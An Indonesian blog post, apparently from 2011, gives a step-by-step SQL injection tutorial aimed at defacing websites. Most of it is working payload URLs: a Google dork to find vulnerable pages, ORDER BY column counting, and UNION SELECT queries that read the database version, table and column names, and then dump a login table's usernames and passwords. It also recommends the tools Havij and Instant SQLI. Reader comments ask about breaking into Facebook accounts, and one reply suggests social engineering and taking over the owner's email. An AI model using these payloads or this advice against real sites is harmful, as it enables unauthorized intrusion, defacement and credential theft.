11
SQL Injection Web dengan Dork

SQL injection merupakan aksi hacking pada keamanan komputer di mana seorang penyerang bisa mendapatkan akses ke basis data di dalam sistem. Langsung aja ya ke permasalahannya yaitu Teknik SQL Injection dengan Dork namun Sebelum men daface sebuah situs, kita bisa menggunakan dork Sql Injection dengan bantuan om google
inurl:"product.php?id=" & intext:"You have an error in your SQL syntax"
Misal yang didapat :
http://www.targetweb.com/detailproduct.php?id=35
untuk mengecek bug pada suatu web tambahkan single quote ( ' ) dibelakang url
http://www.targetweb.com/detailproduct.php?id=35'


Setelah itu akan muncul bug pesan error :
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '\' and b.id=a.cat' at line 1

Untuk mencari column gunakan perintah [ order by ]
http://www.targetweb.com/detailproduct.php?id=35 order by 1--
mulai dari angka 1,2,3 dan seterusnya hingga menemukan pesan error selanjutnya 2, dst sampe muncul pesan error "Unknown column '17' in 'order clause'"
Pesan error muncul pada angka 17
http://www.targetweb.com/detailproduct.php?id=35 order by 17--
muncul pesan error:
Unknown column '17' in 'order clause'

Jadi angka yang diambil adalah 17-1 = 16 (jumlah column adalah 16)

Berikutnya kita akan mencari "angka" dimana dengan angka tersebut kita bisa melakukan injection dengan perintah "union all select"
http://www.targetweb.com/detailproduct.php?id=-35 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--
Jangan lupa tambahkan tanda kurang ( - ) didepan angka parameter ID 35

akan muncul "angka" : 4, 7 dan 13
Pilih salah satunya saja, misal 4
Langsung kita cari versi Database MySql-nya dengan perintah [version()] atau [@@version] pada angka 4
http://www.targetweb.com/detailproduct.php?id=-35 union all select 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16--

Nanti diweb tersebut akan muncul tulisan :
5.0.91-community
Ternyata versi 5, kalau versi 4 lain waktu akan saya bahas.

Selanjutnya kita akan mencari table-nya dgn perintah "group_concat(table_name)" pada salah satu angka dan menambahkan "+from+information_schema.tables+where+table_schema=database()--" di belakang angka 16
http://www.targetweb.com/detailproduct.php?id=-35 union all select 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables+where table_schema=database()--

Akan muncul nama-nama table :
login,tbanner,tcatprod,tproduct,tset dan lain-lain

Selanjutnya kita cari column dari table yg ada hubungannya dengan user+password,
kali ini kita ambil table "login"
sebelumnya kita convert dulu ke hexa agar dapat dibaca oleh Sql di sini :
http://cyber4rt.com/~converter
ketik : login
pilih ASCII to Hex
hasilnya : 6c6f67696e

Perintah selanjutnya adalah "group_concat(column_name)" pada angka 4 dan "+from+information_schema.columns+where+table_name=0xHEXA--" di akhir URL

ganti HEXA dengan hasil convert tadi yaitu : 6c6f67696e
tambahkan 0x didepan hexa agar server dapat mengetahui bahwa itu telah diconvert
ke hexa
http://www.targetweb.com/detailproduct.php?id=-35 union all select
1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16+from+info
rmation_schema.columns+where+table_name=0x6c6f67696e--

muncul column : user,pass

untuk melihat isi dari kedua column tersebut gunakan perintah "group_concat(column1,0x3a,column2)" pada angka ajaib 4 dan +from+NAMATABLE-- pada akhir URL

ganti column 1 dengan " user " dan column 2 dengan " pass "
0x3a adalah tanda titik dua ( : ) yang telah diconvert ke hexa
NAMA TABLE diganti dengan " login " untuk mengambil informasi dari table yang bernama
"login"
http://www.targetweb.com/detailproduct.php?id=-35 union all select
1,2,3,group_concat(user,0x3a,pass),5,6,7,8,9,10,11,12,13,14,15,16+from+login--

hasil : admin:admin
jadi,
user = admin
password = admin

Selesai pencarian User dan Password, dilanjutkan ke pencarian Page Admin.
Untuk mencari page admin, gunakan aplikasi berikut:
Instant SQLI
Atau juga bisa gunakan Aplikasi Havij

NB: ini saya ambil dari tutor yang saya baca dan sedikit saya ubah bahasa penulisan dan web tujuan.

11 komentar :

mybook mengatakan... [Reply to comment]

mantap bro
tapi kalau account facebook bisa gak di sql kan ya..????

Ujie Caprone mengatakan... [Reply to comment]

Wah kalau akun facebook gak bisa dengan cara ini, mesti main social enginerring alias menculik email sipemilik

love_tune mengatakan... [Reply to comment]

maaf om saya msi newbie..
sya gk ngrti gmn cara nyari dork ny lwat google,,
mhon ptnjuk ny om,,
bales k runebal88@yahoo.co.id
sbelumny trima kasih,,

Anonim mengatakan... [Reply to comment]

nimbrung gan,,,, ada yang pernah coba inject facebook , explode dunks...!!

FunkyNetter mengatakan... [Reply to comment]

Wuiii serem;;;;;

Anonim mengatakan... [Reply to comment]

bingung gan, newbie neh

Anonim mengatakan... [Reply to comment]

check this link, louis vuitton sac , for special offer

Anonim mengatakan... [Reply to comment]

check designer messenger bags at my estore

Anonim mengatakan... [Reply to comment]

for Replica Purses for promotion code 0616BI0P

Anonim mengatakan... [Reply to comment]

sell knock off chanel bags , for special offer

Anonim mengatakan... [Reply to comment]

That is a very good tip particularly to those fresh to the blogosphere.
Simple but very accurate info… Many thanks for sharing this
one. A must read post!

my webpage ... simply click the up coming internet page

Posting Komentar

Silahkan tinggalkan komentar anda disini...

 
Ujie Caprone | © 2011 Blogger Template by Ujiecaprone.com